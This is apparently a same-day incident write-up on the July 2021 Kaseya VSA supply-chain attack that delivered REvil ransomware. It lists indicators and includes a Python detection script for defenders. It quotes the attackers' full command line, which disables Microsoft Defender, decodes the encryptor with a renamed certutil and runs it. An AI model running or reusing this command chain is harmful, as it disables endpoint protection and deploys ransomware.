Updated 7/2/2021 - 17:51 ET
Shortly after 2 PM on Friday, July 2, 2021, administrators of the Kaseya VSA (Remote Monitoring and Management) Software as a Service began to experience issues where users were locked out and customer agents were receiving scripts to deploy ransomware. By 3 PM Kaseya had shut down and placed all cloud servers in maintenance mode and had put out communication to all self-hosted VSA partners to shut down their servers.
At least 8 Technology Service Providers have confirmed that thousands of their customers have now been encrypted by a REvil ransomware-as-a-service affiliate. Over the next 24-48 hours both the number of service providers and the number of end customers affected by this are expected to grow.
If you are a Kaseya VSA provider, some signs of the attack are:
The ransomware encryptor is dropped to c:\kworking\agent.exe
The VSA procedure is named "Kaseya VSA Agent Hot-fix"
At least two tasks run the following: "C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
What about Multi-Factor Authentication (MFA)?
A number of the service providers impacted by this have also acknowledged that multi-factor authentication was in use for all accounts and the security breach still occurred. This points to a supply-chain-style zero-day vulnerability within the Kaseya VSA platform. This is an important fact, as MFA has become a security baseline for preventing attacks and securing environments.
What is happening?
Once a service provider's Remote Monitoring and Management toolset is compromised, users have reported that all users of the Kaseya VSA platform are locked out; the agent will then drop a certificate file named agent.crt into the c:\kworking folder, which is used for updates to VSA. A PowerShell command is then launched to decode the agent.crt file using the legitimate Microsoft Windows certutil.exe and extract an agent.exe file to the same folder.
The new agent.exe is signed using a certificate from PB03 Transport LTD and includes an embedded MsMpEng.exe and MPSvc.dll. The .dll file is the REvil data encryptor, while MsMpEng.exe is used to launch the DLL and encrypt the drive.
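To turn the signs listed above (the procedure name, the c:\kworking paths, the Defender-disabling Set-MpPreference call and the renamed certutil -decode step) and the agent.crt to agent.exe chain just described into something a defender can run over process-creation telemetry, here is an added Python example. It is not code from the original post or from Kaseya. It assumes command lines have already been exported from Windows Security event 4688 or Sysmon event 1 into a list of dicts with host, cmdline and an optional procedure field; the sample events are constructed, except for the first command line, which is the one quoted in the post, and the rule names and severity thresholds are my own choices.

```python
from __future__ import annotations

import re

# Behavioural indicators taken from the task command line quoted in the post.
# Each entry is (rule name, compiled pattern); matching is case-insensitive
# because Windows paths and PowerShell cmdlets are.
RULES = [
    ("defender_tampering",
     re.compile(r"Set-MpPreference\b.*?-Disable(?:RealtimeMonitoring|IOAVProtection"
                r"|ScriptScanning|IntrusionPreventionSystem)", re.I)),
    # certutil.exe copied to another name before use (C:\Windows\cert.exe in the post)
    ("certutil_copied",
     re.compile(r"\bcopy\b[^&|]*certutil\.exe\s+[^&|\s]+\.exe", re.I)),
    # -decode of agent.crt inside the VSA working folder
    ("certutil_decode_in_kworking",
     re.compile(r"-decode\s+\S*kworking\\agent\.crt", re.I)),
    # the decoded encryptor being launched from c:\kworking
    ("kworking_agent_launch",
     re.compile(r"(?:^|[\s&])[a-z]:\\kworking\\agent\.exe\b", re.I)),
]

# The VSA procedure name the post reports, compared case-insensitively
# against the event's 'procedure' field when one is present.
SUSPICIOUS_PROCEDURE = "kaseya vsa agent hot-fix"


def scan_command_line(cmdline: str) -> list[str]:
    """Return the names of every rule that matches one process command line."""
    return [name for name, pattern in RULES if pattern.search(cmdline)]


def triage(events: list[dict]) -> list[dict]:
    """Score process-creation events and return one finding per suspicious event.

    Two or more behavioural rules on a single command line, or the known
    procedure name, is rated 'high'; a lone rule hit is 'medium' so that
    legitimate administrative use of Set-MpPreference is surfaced, not hidden.
    """
    findings = []
    for ev in events:
        hits = scan_command_line(ev["cmdline"])
        proc_match = ev.get("procedure", "").strip().lower() == SUSPICIOUS_PROCEDURE
        if not hits and not proc_match:
            continue
        severity = "high" if len(hits) >= 2 or proc_match else "medium"
        findings.append({"host": ev["host"], "severity": severity,
                         "rules": hits, "procedure_match": proc_match})
    return findings


# Constructed sample events (not real telemetry). The first command line is
# the one quoted in the post; the others are benign administrative activity.
SAMPLE_EVENTS = [
    {"host": "ws-017", "procedure": "Kaseya VSA Agent Hot-fix",
     "cmdline": r'"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & '
                r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference '
                r'-DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true '
                r'-DisableIOAVProtection $true -DisableScriptScanning $true '
                r'-EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode '
                r'-Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & '
                r'copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & '
                r'echo %RANDOM% >> C:\Windows\cert.exe & '
                r'C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & '
                r'del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe'},
    {"host": "ws-018", "cmdline": r"certutil.exe -hashfile C:\Downloads\image.iso SHA256"},
    {"host": "ws-019", "cmdline": r"powershell.exe Get-MpPreference"},
    {"host": "srv-02", "procedure": "Monthly patch scan",
     "cmdline": r'"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 2 > nul & wuauclt /detectnow'},
]


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(f"{finding['host']}: {finding['severity']} "
              f"rules={finding['rules']} procedure_match={finding['procedure_match']}")
```

Run against the samples, only ws-017 is reported, at high severity with all four rules and the procedure name matching. A single Set-MpPreference change on its own comes back as medium, which keeps routine Defender administration visible for review without drowning it in the same alert as the full chain.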
The Demand!
A sample of the REvil ransomware used in one of these attacks has been shared online, but it is not certain the same demand will apply to all victims. For the sample posted online the ransomware gang is demanding a $5 Million ransom to receive the decryption key. You can view the configuration file dump here.
What's Next?
The speed at which files were encrypted after user accounts were locked out of Kaseya VSA might suggest that data was not exported before encryption; however, ransomware operators have trended more and more toward an export-then-encrypt method, so if your data is encrypted I would assume it may also have been breached, and you should review your breach notification plans.
The impacted service providers will work tirelessly to restore both their own and their clients' systems, likely all hands on deck all weekend long. Kaseya will do the same, as getting the platform back online and patching the security flaws are its top two priorities for retaining its customer base.
While the attack started only roughly 4 hours ago, it will be days or weeks until the full scope is understood.